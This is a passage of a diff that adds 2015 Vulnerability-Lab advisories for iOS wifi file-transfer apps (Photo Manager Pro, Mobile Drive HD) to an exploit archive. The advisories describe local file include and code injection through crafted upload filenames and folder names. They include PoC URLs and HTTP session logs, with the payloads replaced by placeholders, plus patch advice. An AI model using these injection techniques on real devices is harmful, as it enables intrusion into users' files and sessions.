Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:49276/]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------28140821932238
|
||||
Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:49276/
|
||||
http://localhost:49276//%3C./
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
|
||||
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
|
||||
Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
206
platforms/ios/webapps/36796.txt
Executable file
206
platforms/ios/webapps/36796.txt
Executable file
|
@ -0,0 +1,206 @@
|
|||
Document Title:
|
||||
===============
|
||||
Photo Manager Pro v4.4.0 iOS - File Include Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1445
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-12
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1445
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.9
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
|
||||
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
|
||||
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
|
||||
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
|
||||
Basic Transfer: Import/Export photos from/to the Photos app.
|
||||
|
||||
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-03-12: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Linkus
|
||||
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
|
||||
commands to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with
|
||||
malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include
|
||||
execution occcurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of
|
||||
the `wifi interface` in connection with the vulnerable upload service module.
|
||||
|
||||
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique
|
||||
local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
|
||||
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application or device compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] upload.action
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
|
||||
Affected Module(s):
|
||||
[+] disp_photo.action
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC:
|
||||
http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div id="photo_content">
|
||||
<img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div>
|
||||
|
||||
|
||||
--- Poc Session Logs [POST] (Inject) ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/upload.action?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/upload.html?folderID=5]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------15932100885119
|
||||
Content-Disposition: form-data; name="is_submitted"
|
||||
false
|
||||
-----------------------------15932100885119
|
||||
Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
|
||||
Content-Type: image/png
|
||||
-
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/upload.html?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[8085]
|
||||
Date[Do., 05 März 2015 20:52:18 GMT]
|
||||
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/upload.action?folderID=
|
||||
http://localhost:8080/upload.html?folderID=
|
||||
http://localhost:8080/disp_photo.action?filename=
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
|
||||
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of thelocal file inelcude web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
231
platforms/ios/webapps/36797.txt
Executable file
231
platforms/ios/webapps/36797.txt
Executable file
|
@ -0,0 +1,231 @@
|
|||
Document Title:
|
||||
===============
|
||||
Mobile Drive HD v1.8 - File Include Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1446
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-11
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1446
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.4
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Mobile Drive is the ideal app for anyone who transfer documents between PC, iPad and Cloud. Mobile Drive allows you to manage
|
||||
documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services.
|
||||
|
||||
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-03-11: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Keke Cai
|
||||
Product: Mobile Drive HD- iOS Mobile Web Application 1.8
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
|
||||
to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
|
||||
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
|
||||
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
|
||||
in connection with the vulnerable upload POST method request.
|
||||
|
||||
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
|
||||
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
|
||||
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Upload
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8080/)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC:
|
||||
http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'>
|
||||
<form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/>
|
||||
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
|
||||
</table>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
Status: 302[Found]
|
||||
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------21144193462
|
||||
Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
|
||||
Content-Type: image/png
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[2739]
|
||||
Date[Mo., 09 März 2015 14:24:12 GMT]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/jquery.js Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[*/*]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[55774]
|
||||
Date[Mo., 09 März 2015 14:24:12 GMT]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[application/json, text/javascript, */*]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
X-Requested-With[XMLHttpRequest]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[62]
|
||||
Cache-Control[private, max-age=0, must-revalidate]
|
||||
Content-Type[text/plain; charset=utf-8]
|
||||
Date[Mo., 09 März 2015 14:24:13 GMT]
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/files/
|
||||
http://localhost:8080/jquery.js
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
|
||||
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
|
||||
Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
265
platforms/ios/webapps/36798.txt
Executable file
265
platforms/ios/webapps/36798.txt
Executable file
|
@ -0,0 +1,265 @@
|
|||
Document Title:
|
||||
===============
|
||||
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1444
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-10
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1444
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
8.6
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
|
||||
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
|
||||
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
|
||||
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
|
||||
Basic Transfer: Import/Export photos from/to the Photos app.
|
||||
|
||||
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-03-10: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Linkus
|
||||
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Critical
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the
|
||||
target mobile device.
|
||||
|
||||
The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the
|
||||
`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected
|
||||
device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code.
|
||||
The input context is becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side.
|
||||
|
||||
The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
|
||||
Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password.
|
||||
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent
|
||||
manipulation function or connected module context.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] newfolder.action
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] folderName
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index (http://localhost:8080)
|
||||
[+] Sub Category Path
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: Create Folder
|
||||
|
||||
<div id="main"><div id="breadcrumb">Home</div>
|
||||
<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
|
||||
</div>
|
||||
|
||||
... after surfing to the created folder
|
||||
|
||||
<div id="wrapper">
|
||||
<div id="header">
|
||||
<div id="title">
|
||||
<h1>Photo Manager Pro</h1>
|
||||
</div>
|
||||
</div>
|
||||
<div id="main">
|
||||
<div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
|
||||
<form id="download_form" action="download.action" method="post">
|
||||
<div id="content"><ul></ul></div>
|
||||
</form>
|
||||
</div>
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
}
|
||||
|
||||
function createFolder() {
|
||||
$.ajax({
|
||||
type: 'POST',
|
||||
url: 'newfolder.action',
|
||||
cache: false,
|
||||
dataType: 'json',
|
||||
data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
|
||||
async: false,
|
||||
success: function(result) {
|
||||
window.location.reload(false);
|
||||
}
|
||||
});
|
||||
}
|
||||
</script>
|
||||
|
||||
|
||||
--- Poc Session Logs [POST] (Inject) ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/newfolder.action
|
||||
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[application/json, text/javascript, */*; q=0.01]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
